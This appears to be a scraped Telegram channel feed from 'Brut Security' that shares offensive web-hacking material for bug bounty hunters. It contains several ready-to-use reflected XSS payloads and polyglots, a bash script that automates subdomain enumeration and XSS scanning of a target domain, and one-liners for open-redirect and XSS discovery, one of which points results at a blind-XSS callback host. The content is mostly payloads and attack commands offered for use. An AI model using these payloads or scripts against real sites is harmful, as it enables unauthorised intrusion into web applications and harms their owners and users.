Brut Security
14.8K subscribers
919 photos
73 videos
287 files
975 links
βœ…Queries: @wtf_brut
πŸ›ƒWhatsApp: wa.link/brutsecurity
🈴Training: brutsec.com
πŸ“¨E-mail: [email protected]
Download Telegram
SQL INJECTION 101.pdf
750.1 KB
πŸ‘7πŸ”₯4❀2
This media is not supported in your browser
VIEW IN TELEGRAM
🌟Dnsbruter- Dns Bruteforcing Tool🌟
πŸ‘‰It is a powerful tool designed to perform active subdomain enumeration and discovery.

πŸ”—Link https://github.com/sanjai-AK47/Dnsbruter/
πŸ”₯7πŸ‘3
TBHMv4 Recon 4.02.pdf
14.8 MB
Recon Guide by Jhaddix
πŸ”₯15πŸ‘4
❀16πŸ‘5πŸ”₯3
πŸ₯°6❀2
πŸ”₯18
Top 3 RXSS payloads

`'";//><img/src=x onError="${x};alert(`1`);">

`'";//><Img Src=a OnError=location=src>

`'";//></h1><Svg+Only%3d1+OnLoad%3dconfirm(atob("WW91IGhhdmUgYmVlbiBoYWNrZWQgYnkgb3R0ZXJseSE%3d"))>
❀6πŸ”₯3❀‍πŸ”₯1πŸ‘1
Simple Reflected XSS
1. subfinder -d target .com | httprobe -c 100 > target.txt
2. cat target.txt | waybackurls | gf xss | kxxs
πŸ₯°7πŸ”₯3
Brut Security
Simple Reflected XSS 1. subfinder -d target .com | httprobe -c 100 > target.txt 2. cat target.txt | waybackurls | gf xss | kxxs
For Automation Reflected XSS Scanning
#!/bin/bash

# Prompt user for domain input
read -p "Enter the domain you want to scan: " domain

# Define output file
output_file="scan_output.txt"

# Run subfinder to find subdomains, filter through httprobe, and save to target.txt
echo "Finding subdomains for $domain..."
subfinder -d $domain | httprobe -c 100 > target.txt

# Use waybackurls to find URLs from Wayback Machine, filter through gf for XSS, and scan with kxxs
echo "Scanning for XSS vulnerabilities..."
cat target.txt | waybackurls | gf xss | kxxs >> "$output_file"

# Display output file location
echo "Scan output saved to $output_file"
πŸ”₯6❀2
🚨Toxicache🚨
πŸ‘‰Golang scanner to find web cache poisoning vulnerabilities in a list of URLs and test multiple injection techniques.
πŸ”—https://lnkd.in/gdtpJGmT
⚑5❀3πŸ”₯2πŸ‘1🌭1
Awesome Bug Bounty One-liners

A collection of awesome one-liner scripts especially for bug bounty.

Open-redirect

Bash
export LHOST="URL"; gau $1 | gf redirect | qsreplace "$LHOST" | xargs -I % -P 25 sh -c 'curl -Is "%" 2>&1 | grep -q "Location: $LHOST" && echo "VULN! %"'

Bash
cat URLS.txt | gf url | tee url-redirect.txt && cat url-redirect.txt | parallel -j 10 curl --proxy https://127.0.0. .1:8080 -sk > /dev/null

XSS
waybackurls HOST | gf xss | sed 's/=.*/=/' | sort -u | tee FILE.txt && cat FILE.txt | dalfox -b YOURS.xss.ht pipe > OUT.txt

Bash
cat HOSTS.txt | getJS | httpx --match-regex "addEventListener\((?:'|\")message(?:'|\")"

πŸ“š Repositories:
1. https://lnkd.in/dMBdxSQD

2. https://lnkd.in/ebTrAP8y

3. https://lnkd.in/dmG4G3ea

4. https://lnkd.in/dXxHMUu9
πŸ‘10πŸ”₯5
Useful XSS payloads:

"/*\"/*`/*' /*</template> </textarea></noembed></noscript></title> </style></script>-->&lt;svg onload=/*<html/*/onmouseover=alert()//>

data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTIGJ5IFZpY2tpZScpPC9zY3JpcHQ+"

data:text/html,<script>alert(1)</script>

<select><noembed></select><script x='a@b'a>
❀11πŸ‘4πŸ‘Ž1πŸ”₯1